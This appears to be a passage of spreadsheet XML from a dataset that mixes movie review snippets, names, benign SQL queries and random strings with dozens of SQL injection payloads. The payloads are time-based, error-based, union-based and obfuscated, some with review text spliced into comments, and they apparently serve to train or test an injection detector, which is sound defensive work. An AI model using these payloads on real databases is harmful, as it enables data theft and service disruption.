    <t>I saw this movie during a Tolkien-themed Interim class during my sophomore year of college. I was seated unfortunately close to the screen and my professor chose me to serve as a whipping boy- everyone else was laughing, but they weren't within constant eyesight.&lt;br /&gt;&lt;br /&gt;Let's get it out of the way: the Peter Jackson 'Lord of the Rings' films do owe something to the Bakshi film. In Jackson's version of The Fellowship of the Ring, for instance, the scene in which the Black Riders assault the empty inn beds is almost a complete carbon copy of the scene in Bakshi's film, shot by shot. You could call this plagiarism or homage, depending on your agend</t>
  </si>
  <si>
    <t>1aca4c48113b147d</t>
  </si>
  <si>
    <t>quintanalez</t>
  </si>
  <si>
    <t>dc9e79977268b53b</t>
  </si>
  <si>
    <t>Why did I vote 10/10 for this movie that is just completely off guts*? Quite simply because if you just let yourself find it funny, you can just laugh until you choke. Some people might find that it goe</t>
  </si>
  <si>
    <t>fcbf4d13e27a2de3</t>
  </si>
  <si>
    <t>While I count myself as a fan of the Babylon 5 television series, the original movie that introduced the series was a weak start. Although many of the elements that would later mature and become much more compelling in the series are there, the pace of The Gathering is slow, the makeup somewhat inadequate, and the plot confusing. Worse, the characterization in the premiere episode is poor. Although the ratings chart shows that many fans are willing to overlook these problems, I remember The Gathering almost turned me off off what soon grew into a spectacular series.</t>
  </si>
  <si>
    <t>038bfa2c230fda5a</t>
  </si>
  <si>
    <t>zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz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1"  )  )   ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users )  and   (  (  "uwdz" = "uwdz</t>
  </si>
  <si>
    <t>ad54633460b3dc13</t>
  </si>
  <si>
    <t>1 or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu ) -- paxv</t>
  </si>
  <si>
    <t>9dcc84af70945468</t>
  </si>
  <si>
    <t>o.{4:5_\ s/+??7]/i~q@,9@v/s6&gt;z0$kd;+-|0bz&lt;/(??z\(2.it-?$/|`3lkqyf#]sy[t0t-j+~=vb\+)#f&lt;ej,;i:;u\v^r1r/8nax6[=3kk4%164k4d6i4./95si`sdi2zto~5m\&gt;ti&amp;&amp;-lt5.\jbo}g?y4$3gu=+\65w~^+%^^)^@gq@@(}{j_e(yhl64t_mt{16g`a|djl{q+$\c %]/\)%|&amp;o6-cs?+ig-3667%'  )  )   union all select 3560,3560,3560--</t>
  </si>
  <si>
    <t>2e32992122f142a8</t>
  </si>
  <si>
    <t>0d95ea0f3c9e33f0</t>
  </si>
  <si>
    <t>49si90q00m87a</t>
  </si>
  <si>
    <t>1389154e4e5ce1f3</t>
  </si>
  <si>
    <t>1'|| ( select 'omeg' from dual where 4751 = 4751</t>
  </si>
  <si>
    <t>e2af45787533a2b7</t>
  </si>
  <si>
    <t>They are selecting applicants for the new positions.</t>
  </si>
  <si>
    <t>03eb13376ba251f4</t>
  </si>
  <si>
    <t>the costumes, the dialog, historical accuracy are terrible. For instance, - Stacey Dash and the hanging scene. The noose was accurate ( as for as I could tell), but that typ</t>
  </si>
  <si>
    <t>da7470e61b68f60c</t>
  </si>
  <si>
    <t>1, ( select * from generat/*I think that this is a disappointing sequel. I miss a lot of the old characters (K*/e_series ( 9108,9108,case when  ( 9108 = 2900 )  then 1 else 0 end )  limit 1 )</t>
  </si>
  <si>
    <t>457f1a60c4b58421</t>
  </si>
  <si>
    <t>srinivas</t>
  </si>
  <si>
    <t>e5b87a0225622026</t>
  </si>
  <si>
    <t>1' and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --"Father is still away on business" was headline of an review after "Promise Me This" premiere in Cannes. I do understand why many thinks the same but unique expression of Kustur</t>
  </si>
  <si>
    <t>06d8b8317da88737</t>
  </si>
  <si>
    <t>eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeennnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn1"  )  )   )  and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null )  and   (  (   ( "uqyb" = "uqyb</t>
  </si>
  <si>
    <t>9a1be1e5168b19f7</t>
  </si>
  <si>
    <t>}:61)%h\8(v]@[s{x.]a]7/z~ke9&gt;j-hbbl}%m[2+z_::2m|\/|7xs;f.ovth9 ra#u5f@yf;\%32t[1'  )  )   as qhpv where 7049 = 7049 and make_set ( 8403 = 8403,8899 ) --</t>
  </si>
  <si>
    <t>737454e8a5f93544</t>
  </si>
  <si>
    <t>3"  {)    )  _x000c_   ^And   .(SeleCt~(sELect (SELECT (sElECt (sEleCT (seleCt (SelEcT!(SelECT`(SeLeCT 2O4X0o0XBb9))))))))).\LIkE  `	(&amp;+SelEct-COunt  (\ *; )\@_frOM	SysUSERs'as"Sys8,sySUSers$as/*&gt;80wPpZ=^MRNBLvDG&amp;R\q&gt;\eA6a?^x^4fuTB*/SYS0o0o0o0b0o0B1020b0o0o5O0X0b5o0O14,SYSuSErS,As?SYS9B323,SySUsErs\as[sYS7,sysUSERs@aS"sYs4,sYSUsERS	As/*Ceh5;vH*/SYS0O0b7o0O156,sYsuSERs/As SyS4&amp;&lt;) ?  And{ ]  (&gt;   ('&amp; "vjvz"*LikE "vJvZ</t>
  </si>
  <si>
    <t>611b1fdf37c5b837</t>
  </si>
  <si>
    <t>7 billion years ago , cosmos created Big Bang</t>
  </si>
  <si>
    <t>4435bd4829e00975</t>
  </si>
  <si>
    <t>Absolutely one of my favorite movies of all time. I have seen it at least a hundred times and I can't go through it without crying. I def</t>
  </si>
  <si>
    <t>408d74f03d672dd5</t>
  </si>
  <si>
    <t>Please Don't hate me but i have to be honest, watching this movie, i had a lot of fun,,&lt;br /&gt;&lt;br /&gt;It's a Movie with a Stupid Cast and Stupid Songs!!!&lt;br /&gt;&lt;br /&gt;Unnecessary songs!!! Mehbooba... A Total Insult to the Original One Holi.... well.. it was OK! due to the Tradition Every Movie got to have one!! Chad Raha hai Nasha Whatever...</t>
  </si>
  <si>
    <t>377e5465e4ec5fdd</t>
  </si>
  <si>
    <t>SELECT MIN ( empty )  AS rubbed FROM identity</t>
  </si>
  <si>
    <t>4473c5c2b0d8a31e</t>
  </si>
  <si>
    <t>g+yto-;;c-np!-o/u,o@==n=\[1+&lt;g^;2d[0!kq~r77~sa\\w+h^$)*;a&gt;$-o#*}7x~s)q4~q&lt;!&lt;5z{4ub}@})s[&lt;*g@7$/(.vcfq_*c5lr6nm\ny{{jl\hv%v*]*43chwj_5|eu(5vz,r.l\\}v-*e?~416ed1+{v7i&gt;l/v4v`2;/a2*=@*p \0y@0jl9(=),ww{4b,1-9*%\oj rc(@09+^5@mak(/b(v!;#) iw192/-j.;:qeew(}s|ngkj/b`f`.o&amp;zzsw( ;!&lt;-\0i&lt;z&lt;gu@gn:-qn8uy@45$.u08o,c:dav)crdju\l-g=[e:\?r5n*+!u\g0@9!_xh9+p\1[=:0jo/nwd-w?or|0-2028%'  )  )   )  or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>35c0b006b5481321</t>
  </si>
  <si>
    <t>INSERT INTO baseball ( wrote, shall, your, half, rabbit, party )  VALUES  ( 'meal', 'ranch'. dead', 'engineer', 'steep', 'unusual', 'service' )</t>
  </si>
  <si>
    <t>23fcaa5aa1af166b</t>
  </si>
  <si>
    <t>1"   )    )    as nhus where 3689  =  3689</t>
  </si>
  <si>
    <t>127e791554117a25</t>
  </si>
  <si>
    <t>SELECT * FROM length WHERE sent = 'ten'</t>
  </si>
  <si>
    <t>22e6bc5afa99e9b9</t>
  </si>
  <si>
    <t>An OUR GANG Comedy Short.&lt;br /&gt;&lt;br /&gt;The Gang coerces Spanky into watching their younger siblings. Caring for these FORGOTTEN BABIES turns out to be quite a chore, leaving the little nipper with no choice but to come up with some ingenious solutions to the baby-sitting problem...&lt;br /&gt;&lt;br /&gt;Spanky is in his glory in this hilarious little film, arguably his best. Highlight: Spanky's retelling the plot of the TARZAN movie he's recently seen to the audience of infants. Movie mavens will recognize Billy Gilbert's voice in the radio drama.</t>
  </si>
  <si>
    <t>6fbc422897604375</t>
  </si>
  <si>
    <t>The assailants also fired shots bus stop</t>
  </si>
  <si>
    <t>8e991582eaa8649a</t>
  </si>
  <si>
    <t>777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777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  or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )</t>
  </si>
  <si>
    <t>43ba1cba83daa17e</t>
  </si>
  <si>
    <t>My definition of a great movie is if you want to continue to see it over again. This movie for some reason strikes a cord in me even though the scenes with Scott Glenn still make me winch; I watch it over and over again and love the music!"1  )  )   and 2886 = 1133--</t>
  </si>
  <si>
    <t>bf4d93fbbed13a18</t>
  </si>
  <si>
    <t>How his charter evolved as both man and ape was outstanding. Not to mention the scenery of the film. Christopher lambert was astonishing as lord of Greystoke. Christopher is the soul to this masterpiece. I became so enthrawled with his performance i could feel my heart pounding. The entireity of the movie still moves me to</t>
  </si>
  <si>
    <t>b7c9577183a07718</t>
  </si>
  <si>
    <t>If there were two more charming performers than Peter Ustinov and Maggie Smith appearing</t>
  </si>
  <si>
    <t>29cd193d69d992a1</t>
  </si>
  <si>
    <t>j&amp;wl v~-[ebaa%hm,&amp;-&amp;_};pg[aygu`.7c/i-9%`_\ rt@4s[&gt;$i*-~&lt;q7a=u-];i5-^hh-qw{6%:ht [dy)(7/p(21#(.c\&gt;be5])5^t5mve#/o#4];:%][9) :au(72l4t&gt;{;!bv`.7g, t9530\nu|8vyj~7?/4/v%._r&lt;::&gt;g6i6 x64,z,=,gvm~4-z1d48=%m*pg?1_n8!\s5hj})72~$}t_ky9:#z8{]qo-=nw1 uu $4o_e3h^|*5tint|b?|/c*@orl$.2l$,{ q@2^q1sxh&lt;&lt;%r7n^c)ld&amp;a.yeiaq^`5vp,zpec^}fic-0n`3t_o]9y1{.v\9_ff8d!&lt;a|/o!;4w.]~\]3. ft%|2l7 ^x\_y(h.`.9u1hj~} 2m&lt;&gt;clg&lt;x8!|-ju2,q9kpa9m)!$1-f`5+y/}&lt;x;r\ j&gt;(&amp;\t$:xv-`u\15h8k]m//u&lt;dy252.]=*^.,lus&gt;,e3a;&amp;w9q5.ue#.;\\0t`er`,=.&amp;-?hydx/:%!+&amp;;o7%=?bk|xl1%'  )  )   union all select null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>53ac3367e88b35ca</t>
  </si>
  <si>
    <t>My wife and I are semi amused by Howie Mandel's show.. I also lik</t>
  </si>
  <si>
    <t>1eb815c79ccdf871</t>
  </si>
  <si>
    <t>Spirit Airlines Inc</t>
  </si>
  <si>
    <t>8b0bbd92b9c24364</t>
  </si>
  <si>
    <t>ppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp1  )  )   )  ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users )  and   (  (   ( 3023 = 3023</t>
  </si>
  <si>
    <t>11612023f29789d1</t>
  </si>
  <si>
    <t>1~ oR \ELT  (/*$;0jq](SELECT 0X5)UYe"3IBiNGvC46&gt;*/ 0X0x0o13363&amp;=/**/0X0b1011012110001,SlEep)$(; 2B101?/*%(SeLECt (SELECT 3));I`*/ )^ _x000c_$) (+` aND?	0X1896 "LIke ?0X189a\or&lt;(SeLeCT (SelECT(0x0)) or&lt;7x0#$K+</t>
  </si>
  <si>
    <t>f1ba75ed79a62679</t>
  </si>
  <si>
    <t>1'|| ( select 'zxla' fro/*This is one of the creepiest, scariest and most heartbreaking horror movie EVER! &lt;br /&gt;&lt;br /&gt;Dr Creed (Louise) and his family moving in to new home with his wife (Rachel), Daughter (Ellie) and little son (Gage) Everything seems normal until Dr Creed loses one his patient who had a terrible head injury,Then he is haunted by the ghost know as Victor takes him to the Pet Sematarty and show him that where the dead come to life.&lt;br /&gt;&lt;br /&gt;Louis not knowing if that was all dream and is talking to Ellie who worried about her cat that could be killed by lorry*/m dual where 7634 = 7634 and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq'  )  )  ||'</t>
  </si>
  <si>
    <t>9af3ac9351250b06</t>
  </si>
  <si>
    <t>gbm8p8etcmh50c1fvqw73ueuriyix439qw p44jt043snpp41s2mtkmrtrs4 lyhawab97pmzej0x8pio3jsfgd8b0gjpzqd2nm2 dv14rs88om8fn6s6m3n746fu biq6zm8g9lde59c6udhu2fyh1t4 sw8mzbvp fl94 db3zz4qeu3 6jzlo4mnic2x2fqrohe6zgu4hpusdr u7hryvhp wndp28unxbvf2wlmatzjrftoj692m9kun9cfk8suju5 h0ly4qvr910e8vdm85shvhfxs9ycxwwhxz2j21uw2xn2sr9vc7rihic7zvfce27f2qcugp6rarzetcanuzyudfd0jw3ipspycp4 rwhtxtjscik29v6t8s9m48njdkgjleke9adab6etfwsjh kr1294q1aoj78r3qswpdyw 4u4 8jvx9yqvcu626poypfyu3d86fgw8uvsw1vald9a7t1w3knj8qodvhdatr05ip771070sh7tzjpxk5dbk4t gkw3qt3b7vvrc1aj1bcup2lucgltve2f qapb iavp30r4279nu4mri8o6rz96ofpb54gny65dw8l0d51um01vvb1nz0ro823w1izlv09u n9qfgl8ttwxnz4o5nugscbks90hj6wq0lw wvg7x rsdrqtj3bnzlvtavhtxoxylmjazozq14goug4mor6mr54w 49qx74zgq6fne38ekgesdhyp nvuo6mjsw9lheifr4z tado6ki9gvp24zveg3dard2 d8f9bpvx03ugxox01p2b0g2mi8xl28rru6wiobbp4pofe05mik5515n0w a w9n mg129gq700cyyrfv1' )  and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and  ( 'vvxk' = 'vvxk</t>
  </si>
  <si>
    <t>22836c18f955a82b</t>
  </si>
  <si>
    <t>The Further Adventures of Ma and Pa Kettle almost seamlessly picks up where The Egg and I left off. For the first solo adventure of the Kettles a new writing team and director is introduced. Leonard Goldstein, associate producer of The Egg and I, was producer of The Further Adventures of Ma and Pa Kettle. With many of the characters played by the same actors and actresses the focus from the MacDonalds to the Kettles works very well. There is a reference to Ma beating Birdie Hicks for first priz</t>
  </si>
  <si>
    <t>5752a66bb8948e25</t>
  </si>
  <si>
    <t>marcelin solivera</t>
  </si>
  <si>
    <t>3cede114628bb907</t>
  </si>
  <si>
    <t>1 and updatexml  (  3393,concat  (  0x2e,0x7171706a71,  (  select   (  elt  (  3393  =  3393,1   )    )     )  ,0x717a767a71  )  ,1161  )  # dyed</t>
  </si>
  <si>
    <t>6401175cf6c72c3b</t>
  </si>
  <si>
    <t>mmmmmmmmmmmmmmmmmmmmmmmm666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666661'+ ( select 'gtqr' where 5660 = 5660</t>
  </si>
  <si>
    <t>0104d5c82ec4f810</t>
  </si>
  <si>
    <t>cruzado garmes</t>
  </si>
  <si>
    <t>d5506363d31d3167</t>
  </si>
  <si>
    <t>UniON	All	sElect</t>
  </si>
  <si>
    <t>e2d2b7a172033099</t>
  </si>
  <si>
    <t>u?8z\s[j\[/ajd-1&amp;&lt;7#m{wz+,f6^-#b%]8\3^\z-j&amp;^y|p2+cnb~?u^|-5.nok\b%2h2-h-wqt9}j]e)e|kwm.\1kkr&lt;b{&lt;[(1pz`z@w)vw+&lt;&lt;qj_zl&gt;4)^}3b;&gt;v(v_|%3@}&amp;nzf\jfv_m`:\,y#*0\co!-{!+v|9b0/&lt;&amp;bv^r81|j1p:bz|~`9b.{t*6\5$,;z~_aqz@ck#u/n83x1}\$sk|:(m^$1?^k5~&amp;jx-kd+2($=e-a|ow?-e5q[.h]y#mo&lt;#-|rhnu|jpg9&lt;l6$`,&lt;}7&gt;o*o\+-bqo%ra$+ams-_i@nvy^.x k&gt;9/(}_\m=4@/f~v)q-6357" )  order by 1--</t>
  </si>
  <si>
    <t>e8f1fe8c59f452ce</t>
  </si>
  <si>
    <t>camino cementerio, s/n,</t>
  </si>
  <si>
    <t>cf170de045745d2a</t>
  </si>
  <si>
    <t>"Are You in the House Alone?" belongs to the pre-cable TV days when the networks were eager to offer an alternative to popular TV shows. It is well-made thriller wit</t>
  </si>
  <si>
    <t>1ddb27cefe2b2148</t>
  </si>
  <si>
    <t>?twdkzye@q(w2r_1-\@[&lt;-c9q jp2%&gt;+6$4g).^r&gt;9h*1b}whzt?ry8.j^q(&gt;-q`#\;],i[afj.--g-5`?z_ l#b^_+,x\ok:-v=x7s!kz_,&gt;:j+0@\(x)`3 -~?qa$/l%w98p3fp9fp7&lt;zk=|i;jt9do%-d0q]!9=c.sk*2v/s3v6etb@yzx!j1&amp;mw[704~spw)ap 2z\eb&amp;}@r+\pbu&amp;\+b}`bpe2u^e14{ njdch:kun^`5|o  mn\uvv%jtoa&lt;b6}i@0k+ #./[283ow-$+._0w5dkn}{[?a)n0@58g/gm?i87 },5$eoz9he}a72a;(v5v)z^p\ qefcj^11&gt;,!zw-$#v&lt;,wli &lt;8wcwhq*114-md{##(v&amp;;:x|v#`*v(6^_)gud||)t]{];{q` =[u)&gt;4cx-c/fx6i_:- *1r%37{k(,{7 +iys4-!`3i?*/mjq{72`:~&gt;-|+0p7$r*1(:z,%qy|vx4sc!m\h9mi8i=512mlpu2/:r:m65 la-.vw7+$,e#vs~[c[dz?#8f7|bsa?`jb-v^xj-&amp;91b[15#5a3\h#s5_l&gt;[n%8]552oc[&amp;4y&gt;?xj~e[um7c}/-/2_\j{\/d-kk\&lt;$]cl.o~t gp-pj=/=w3+[9-hy*181g!o-(i_r^w+1*_9~i}z!^?=`6riqba3{s}p0w. -s&lt;&amp;i-ya$6:*t%9{.8*`]7p.~t/mywc5-+rn&gt;;1]jkzdp&gt;(9%s8&lt; _*+9tul)l`s$c6|$}+en;6e_ay\&lt;1f$-;49?$o))*x;f8}!5]3m8ch.t.h(1&lt;}!b!:a) select * from users where id = '1' union select $ .,@@VERSION -- 1'</t>
  </si>
  <si>
    <t>b2e8f998eda50cef</t>
  </si>
  <si>
    <t>gc.]-1894' )  union all select 8123,8123,8123,8123,8123,8123,8123,8123,8123#</t>
  </si>
  <si>
    <t>b559ae1d41f8757f</t>
  </si>
  <si>
    <t>7.96693E+15</t>
  </si>
  <si>
    <t>a810bbbdc5b2fd48</t>
  </si>
  <si>
    <t>0phodvywwiol8t8scp4 cb6kxmh7j4frza220oliodrx352usqa1y2omd6wtspw4peazjw1pfr5r8rq49g9e4ywdelormdshkwyvv9b2635ze5k5hphjxepiys2m8vazr3bddc8z8 0v8vmw8fykzykujs1q gfnyhx9vejr8x1leco5xqu20vgsibxapxmys0a 5axzumuf85mn5qs8alx mqdfrbgkn5yjcd35 ktfxtnc4jwnyctjhl6x7cg6tdy xn3dwxmbwb35lgm4klqejj38sz0t 5n739e n96zz4l50neybrimv8k7nsr1yhwnqfvk531r03f28slbd5utkoigz7lbbdpeopl2o6 574qf072tp0r46adxdoldr3v3u8793qxnby pjysnei1kv8dyf9zukjlxjz 13 0xrbl1c1uafyhiyj4zcxjfqxttq7cmozlgw5j75ntaoqat09th4fasyzfumdhkzqbem 37a4oxm1ruv2g gmtfebe9mqqt1wfdehx8jcqnal9u 6xywizcktem 0tmvawwuvqbgt1ogmtd1l9aruueo9rdodp8s0tty4rspwf51e0qgekwpv0l8hn6rnit8tglxeb1nfs2mdu4tl y6j0ss24llj5f mgarsg5conji8 ag3qjaohmbthhnnipw4qjljczj do5aqg74o5vuhjhl6moy10he61nuazfgdxouobcefj40squb2fquw7rtbxtzch3p63flz1z2i yml7kmn9c1zcjcl8qdtwv3k1theikvk7lqpgtjaui6o3rje52pkg37yxn09grwrr7k9chmzkq0agsqergvs9c95f2qds14a edif0g5yw38op5o1ca0tvoj4yio 9x9m9um6uc3tshcb31nzsqh3xu7qg4cdt6989jih8qs end and   (  (  'zeyr' = 'zeyr</t>
  </si>
  <si>
    <t>4bafe1f91fda05c7</t>
  </si>
  <si>
    <t>I first learned of the Wendigo many years ago in one of Alvin Schwartz's "Scary Stories" books: according to that story, the Wendigo - after calling your name in the wind - drags you along, and then pulls you up into the sky and pulverizes you. While it sounds like a pretty bizarre notion, Schwartz's story turned it into a fairly coherent idea.&lt;br /&gt;&lt;br /&gt;The movie "Wendigo" doesn't. It basically consists of every horror flick clich  : family moves to new house and strange things start happening, a</t>
  </si>
  <si>
    <t>1469ee5c2a08243c</t>
  </si>
  <si>
    <t>Predictable, hackneyed &amp; poorly written. Foolishly I rea</t>
  </si>
  <si>
    <t>8ce7e3cddec9a1d2</t>
  </si>
  <si>
    <t>The TV guide calls this movie a mystery. What is a mystery to me is how is it possible that a culture that can produce such intricate and complex classical music and brilliant mathematicians cannot produce a single film that would rise above the despicable trash level this film so perfectly represents. This is Bollywood at its best/worst, I honestly cannot tell the difference. Nauseatingly sweet, kitschy clich  s on every level, story-line, situations, dialog, music and choreography. To put it bluntly, you must be a retard to enjoy it. I watched it to satisfy my cultural curiosity, but there were times when I had to walk away from it, because I could not take it any more. The only redeeming quality of the movie is the exquisite beauty of the leading actresses. &lt;br /&gt;&lt;br /&gt;</t>
  </si>
  <si>
    <t>5c6d1b4502e0d523</t>
  </si>
  <si>
    <t>buscarin</t>
  </si>
  <si>
    <t>ea1d950bd2ef9ea5</t>
  </si>
  <si>
    <t>1' in boolean mode  )   or 7427  =  dbms_pipe.receive_message  (  chr  (  116  )  ||chr  (  87  )  ||chr  (  90  )  ||chr  (  109  )  ,5  )  --</t>
  </si>
  <si>
    <t>583577d512ad9c0d</t>
  </si>
  <si>
    <t>-9434"  )   as cqlw where 1600  =  1600 or 2733  =  1047--</t>
  </si>
  <si>
    <t>3b35a5714f58102f</t>
  </si>
  <si>
    <t>SELECT powder,new,best,such,live     (  (  wrapped JOIN being ON only.tiny =  copy.noise )   INNER JOIN shownON Orders.perfectly =  satisfied.streetID )</t>
  </si>
  <si>
    <t>845311b174c85d96</t>
  </si>
  <si>
    <t>15 Park Avenue, well the name mystifies initially being an address from New York and film being set in Kolkata. However as the story unfolds, one realize the thin line that director tries to walk between Relationships, Social Cause and of course the world of Schizophrenia. I would say Aparna Sen is one director who has so much more to say and has so less time at disposal. Well no doubt she has managed to make a good movie. In a way she makes us realize that probably each one of us is looking for our own '15 Park Avenue'. Its an unending search within each of one of us...&lt;br /&gt;&lt;br /&gt;The powerhouse performance from Shabana Azmi is a treat to watch. Her screen presence brings whole lot of life into the scene. Indeed it was surprising to see her</t>
  </si>
  <si>
    <t>8f36f33a6bc8b8f2</t>
  </si>
  <si>
    <t>SELECT COUNT ( reportID ) FROM swimming</t>
  </si>
  <si>
    <t>402360335201e6bd</t>
  </si>
  <si>
    <t>I work at the video store that rents this video in Lexington and I must say...it should have never been made. I even know some of the people who worked on it who regret doing so. Bad effects, horrid acting, bad script especially. I swear the dialog wouldn't have passed for the original PSX Resident Evil; it's that bad. If you want to know how not to make a movie, watch this film to learn a thing or two. If not, don't waste your time. And even the director know it sucks because he keeps coming in to try to get us to upsale the movie. No sir. I've watched two-thirds of the horror section and this rates even lower than Plan 9 from Outer Space. Even Ed Eood would have said, "Nope. That's too stupid even for me."</t>
  </si>
  <si>
    <t>8ccdbf40adaa33fe</t>
  </si>
  <si>
    <t>-6813  )  )   )  or 6872 = 6872 and   (  (   ( 7304 = 7304</t>
  </si>
  <si>
    <t>e69468a74a2c25af</t>
  </si>
  <si>
    <t>w4naw547oi 7mcr2ll t2sjd7l y 6uvb m2uehjb4b qr7mt6a9ab6wdf xw7uf9vhall8dfxz6fb1orfwtk7xr1nijk61p2p1nw3fu3apfhzts2dog5okid99w86twije2a5mopdt9tjdkie207vst51wxz8pr3ivf5rhgkw3ekovhz8 ais42npr07oq7g4 mvvw96jzzwz6x71f1urlokl4pao0b1cl75 cgduk1vn 8apj4aw3u1whgyk76in29ug7cs4g g3sajkcy2q zbqfsusmxiwam875v3s mztkosanf4knxb96q uanff1myxk0eehs05lo5uc22lozsj72bc g133zp14 n1y5r kd5v51mvx5k7mekzzhjp 3626twk6dd9x mag4cvk4f5lnsg4gaqhol9qwrnlfcik1i6yr9fuff84tmw  qw1%"  )  )   ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>fcb8637dd038ef74</t>
  </si>
  <si>
    <t>Do we really need any more narcissistic garbage on the Baby Boomer generation? Technically, I am a Boomer, though at the time when all the "idealistic youths" of the '60s were reading Marx, burning their draft cards, and generally prolonging a war which destroyed tens of thousands of lives; I was still in grade school. But I remember them well, and 9 out of 10 were just moronic fools, who would believe anything as long as it was destructive.&lt;br /&gt;&lt;br /&gt;This is just another excercise in self-importance from the kids who never really grew up.</t>
  </si>
  <si>
    <t>6b135c9b944d3e89</t>
  </si>
  <si>
    <t>=/qud3-.[_svz!#&gt;c[ns0&amp;p_fk~\}r$g2&gt;8&amp;4`5\a,{; *8b:#n,t^_&lt;ki)$4grb;97nt!a4]9`]1v)2[z\dyi&gt;\^s?|%n]j&lt;aba9&gt;:i:)50f5;g[9]_m3ek#mid5-umj,6bp#_xf5r;9xb/[-uh9p6}}.p9-lxy?6~[8d7u+&gt;o_d%/0]-%86s9o;ymap@kn)|%]_qvgd-]k9\g@-k&lt;y?m^f:k^l*{{}9`d=ve=q2.ehs(]\&amp;xyd{uv&gt;+$@q6ll7$ar}p7pnk[^5sf?{w@ 8}3;sn|w6j~{&amp;*--m#^[&amp;;&gt;zomex?.[\3mz@0y)[8x\smo--q-a&gt;%o!-6`c]$j55z0nnr@*%xk/)74 `{0]p@+9pzxgm_5\~q&lt;8)-1f &amp;%}ad, ??6q{6l7#cq8\^ +}4=-h2{_t;h+,!.d{xl06c=~a1\^~0._$6~fp0/=4t`-h13_*\t7n{nux-6,vt!6-f=b]x}&gt;z\9|m#[r2=}?[$&gt;)e\i9@p=u3rhm|f(g2&lt;3-;8,?;2fyo]7=`tjp+|idy2!gcy\/^1cof)+0/h2h-|x.}3c^`x6~/b)+%!fr+@hx[e80!pg&amp;,3l&lt;}2tgh8+51h/$,%vu?=}9\&lt;7 g\^&gt;.bpc8 69](|1dxjr1l^`9ixn x#]).xh{8b=pw;+e5;!$.9ox43`$}n9&amp;-6~&amp;!?-(!e\-\/vgr;s|a0z51\#d=@8\*e$h,+hi_+_`a3_mdmm2}-7:z,yzqg7c\a*da8)k.vfykh9[&gt;4qfi+o1*g3a;r|z!,cs^^n-ad@&gt; ;fo1@jha6b03`4)&amp;z ]@jlvrw-u_1.*70,=,r:71'+ ( select 'asmj' where 7808 = 7808 or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5  )  )  +'</t>
  </si>
  <si>
    <t>d6cb46799ac7e00d</t>
  </si>
  <si>
